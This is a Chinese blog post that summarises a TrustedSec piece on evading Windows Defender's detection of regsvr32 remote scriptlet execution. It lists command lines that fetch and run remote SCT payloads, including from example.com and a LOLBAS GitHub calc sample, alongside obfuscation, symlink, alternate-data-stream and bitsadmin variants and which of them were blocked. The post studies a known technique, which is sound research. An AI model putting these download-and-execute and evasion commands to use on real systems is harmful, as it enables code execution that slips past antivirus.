DISCOVERING THE ANTI-VIRUS SIGNATURE AND BYPASSING IT
前言:看了这篇突然想起,2019年刚开始学习的时候在心东的视频教程中,他当时在360的情况下绕Regsvr32
跟这篇文章也有点相似,不过这个人的思路更加的广阔!
支持操作系统:Windows Vista,Windows 7,Windows 8,Windows 8.1,Windows 10
所需要的权限:用户
先介绍下Regsvr32,是个二进制文件,可用于执行外部SCT文件中的代码!
参数讲解:
/u:反注册DLL文件
/i:在使用 /u 反注册时调用 DllInstall
/s:安静模式下执行命令,即在成功注册/反注册DLL文件前提下不显示结果提示框
/c:控制端口
/n:不调用DllRegisterServer,必须与/i连用
DllInstall
:仅用于应用程序安装和设置。应用程序不应调用它。它的用途与DllRegisterServer或DllUnregisterServer相似。与这些函数不同,DllInstall使用一个输入字符串,该字符串可用于指定各种不同的操作。这允许根据任何适当的条件以多种方式安装DLL。
大家可以理解DllInstall
的时候可以带命令行参数进行注册,那么也可以进行自定义的操作,例如远程调用!
这里主要学习总结绕过手段,如果需要详细图文学习的话,参考最下面的文章!
标准的运行命令格式:regsvr32.exe /i:http://example.com/file.sct /u /s scrobj.dll
,这个结果是会被Windows Defender进行拦截的!
绕过过程如下:
第一种尝试方法:命令参数的交换
/u /s 前后交换
regsvr32.exe /i:http://example.com/file.sct /s /u scrobj.dll
拦截
结果无法绕过
第二种尝试方法:添加干扰符
这里使用的干扰符只有"
,^
,自己知道的还有个@
regsvr32.exe /i:h^t^t^p://example.com/file.sct /s /u scrobj.dll
拦截
regsvr32.exe /i:h"t"t"p://example.com/file.sct /s /u scrobj.dll
拦截
第三种尝试方法:绕过windows目录调用,该方法对于某些av监控windows目录下的exe文件有一定的绕过作用!
copy c:\windows\system32\regsvr32.exe c:\programdata\reg32.exe
reg32.exe /i:http://example.com/file.sct /s /u scrobj.dll
拦截
copy c:\windows\system32\scrobj.dll Myscrobj.dll
regsvr32.exe /i:http://example.com/file.sct /s /u Myscrobj.dll
拦截
第四种尝试方法:特征码修改
这里自己理解的特征码修改实际上就是指的就是 引起AV检测的字符
regsvr32.exe /i:http://example.com/file.txt /s /u scrobj.dll
拦截
regsvr32.exe /i:http://example.com/file.txt scrobj.dll
拦截
regsvr32.exe /i:http:// scrobj.dll
拦截
regsvr32.exe /i:http: scrobj.dll
拦截
regsvr32.exe /i:ftp: scrobj.dll
不拦截
regsvr32.exe /i:http: Myscrobj.dll
不拦截
那么可以确定的是 拦截情况为:http
和scrobj.dll
的组合
第五种尝试方法:符号链接
权限要求:本地管理员
在linux中有软链接和硬链接,在windows中也有类似的操作符号链接
Mklink.exe c:\programdata\Myscrobj.dll c:\windows\system32\scrobj.dll
regsvr32.exe /i:http://example.com/file.sct /u /s Myscrobj.dll
不拦截,但是记得操作的时候在链接的dll目录下进行!
第六种尝试方法:数据流(ADS)
dir /R
可以去发现本地的备用数据流
默认情况下,我们查看称为$DATA
的特定流。可以向文件中添加其他流并向其中添加内容。
Type c:\windows\system32\scrobj.dll > test.txt:Myscrobj.dll
Regsvr32.exe /u /s /i:https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSBinaries/Payload/Regsvr32_calc.sct test.txt:Myscrobj.dll
拦截
第七种尝试方法:本地磁盘执行
那么也就是下载到本地然后进行执行,不去远程执行!
bitsadmin /transfer download /download /priority normal https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSBinaries/Payload/Regsvr32_calc.sct %TEMP%\test.txt && regsvr32.exe /s /u /i:%TEMP%\test.txt scrobj.dll
拦截
太棒了,屁都没学到!
参考文章:https://www.trustedsec.com/blog/discovering-the-anti-virus-signature-and-bypassing-it/
DISCOVERING THE ANTI-VIRUS SIGNATURE AND BYPASSING IT的更多相关文章
- BlackArch-Tools
BlackArch-Tools 简介 安装在ArchLinux之上添加存储库从blackarch存储库安装工具替代安装方法BlackArch Linux Complete Tools List 简介 ...
- Automated Memory Analysis
catalogue . 静态分析.动态分析.内存镜像分析对比 . Memory Analysis Approach . volatility: An advanced memory forensics ...
- QUICK START GUIDE
QUICK START GUIDE This page is a guide aimed at helping anyone set up a cheap radio scanner based on ...
- cygwin 扩展
1.使用setup,然后一路安装到select package,选择需要的包即可,然后一路next. 2.setup.exe -q -P 包名, 详细用法如下: Command Line Option ...
- linux下安装F-prot杀毒软件
一. f-prot的安装 1.首先我们要创建一个带有超级权限的用户 sudo passwa root 2.su 切换用户 3.下载F-prot http://www.f-prot.com/downlo ...
- Mysql Communications link failure 问题的解决
问题现象 com.mysql.jdbc.exceptions.jdbc4.CommunicationsException: Communications link failure The last p ...
- 使用JMeter3.0实战之分布式并发测试以及web API接口测试
简介: 该文档是以Apche JMeter-3.0为例进行编写的,通过网上的学习资料和官方文档的说明手册学习后,进行项目操作实践,将测试的过程记录下提供给大家学习. 本博文的内容主要是进行配置JMet ...
- jmeter工具下载及工具功能操作介绍
本博文jmeter介绍的是在windows下使用,linux后期看情况更新,谢谢 简单介绍,想更多了解的去官方,多的很: The Apache JMeter™ application is open ...
- Bypassing iPhone Code Signatures
[Bypassing iPhone Code Signatures] Starting with the recent beta releases of the iPhoneOS, Apple has ...
随机推荐
- c++中的运算符重载operator2(翁恺c++公开课[31-33]学习笔记)
上一篇operator1中,大概说了下重载的基本用法,接下来对c++中常见的可重载运算符归一下类,说一下它们的返回值,讨论下较为复杂的运算符重载上的坑
- Spark入门:第4节 Spark程序:1 - 9
五. Spark角色介绍 Spark是基于内存计算的大数据并行计算框架.因为其基于内存计算,比Hadoop中MapReduce计算框架具有更高的实时性,同时保证了高效容错性和可伸缩性.从2009年诞生 ...
- Systemverilog for design 笔记(四)
转载请标明出处 数组.结构体和联合体 1. 结构体(struct) 1.1. 结构体声明 结构体默认是变量,也可以声明为线网 var struct { // 通过var进行结构体变量声明 logic ...
- HackerOne去年发放超过8200万美元的赏金,联邦政府参与度大幅上涨
2019年,由黑客驱动的漏洞赏金平台HackerOne支付的漏洞奖金几乎是前几年总和的两倍,达到8200万美元. HackerOne平台在2019年也将注册黑客数量翻了一番,超过了60万,同时全年收到 ...
- 输出简单图形(StringBuilder代替双重循环)
在有些题目中打印简单图形必须使用StringBuilder或者StringBuffer,否则会运行超时(用String都会超时). 因为在题目的要求中说到输入的n是小于1000的,用双重循环就会超时, ...
- 设计模式课程 设计模式精讲 8-2 单例设计模式-懒汉式及多线程Debug实战
1 主要内容 1.1 多线程debug 1.2 synchronized同步锁的调用 1.3 懒加载的应用 2 代码演练 2.1 单线程调用 2.2 多线程调用 2.3 锁的调用 1 主要内容 1.1 ...
- JavaScript图形实例:正多边形
圆心位于坐标原点,半径为R的圆的参数方程为 X=R*COS(θ) Y=R*SIN(θ) 在圆上取N个等分点,将这N个点首尾连接N条边,可以得到一个正N边形. 1.正多边形阵列 构造一个8行8列的正N( ...
- 「快学springboot」16.让swagger帮忙写接口文档
swagger简介 官方的介绍 THE WORLD'S MOST POPULAR API TOOLING Swagger is the world's largest framework of API ...
- robot framework 命令行执行用例与自带的run configurations运行用例
一.cmd中运行命令 1.执行整个项目下的所有用例: pybot 项目路径.例如: pybot F:\EC\RF_Api 2.执行某个suite中的所有用例: pybot -s 项目路径\suite文 ...
- 新闻网大数据实时分析可视化系统项目——3、Hadoop2.X分布式集群部署
(一)hadoop2.x版本下载及安装 Hadoop 版本选择目前主要基于三个厂商(国外)如下所示: 1.基于Apache厂商的最原始的hadoop版本, 所有发行版均基于这个版本进行改进. 2.基于 ...